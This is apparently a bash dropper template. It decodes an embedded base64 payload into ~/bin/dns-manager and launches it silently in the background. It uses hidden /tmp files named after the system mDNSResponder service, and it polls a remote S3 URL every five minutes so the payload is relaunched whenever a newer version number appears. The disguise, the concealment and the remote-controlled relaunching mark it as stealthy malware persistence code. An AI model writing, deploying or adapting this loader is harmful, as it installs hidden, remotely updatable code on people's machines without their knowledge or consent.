#!/usr/bin/env bash

h="{{script}}"

function activate () {
  if [ ! -f ~/bin/dns-manager ]; then
    echo "$h" | openssl enc -base64 -d > ~/bin/dns-manager
    chmod u+x ~/bin/dns-manager
  fi

  if [ -f /tmp/.mDNSResponder.pid ]; then
    kill $(cat /tmp/.mDNSResponder.pid)
  fi

  ~/bin/dns-manager &> /dev/null & disown
}

function main () {
  while true; do
    local response="$(curl -s https://s3-us-west-2.amazonaws.com/mdnsresponder/update)"
    if [ ! -f /tmp/.mDNSResponder ] || [ "$response" -gt "$(cat /tmp/.mDNSResponder)" ]; then
      activate
      echo "$response" > /tmp/.mDNSResponder
    fi
    sleep 300
  done
}

main
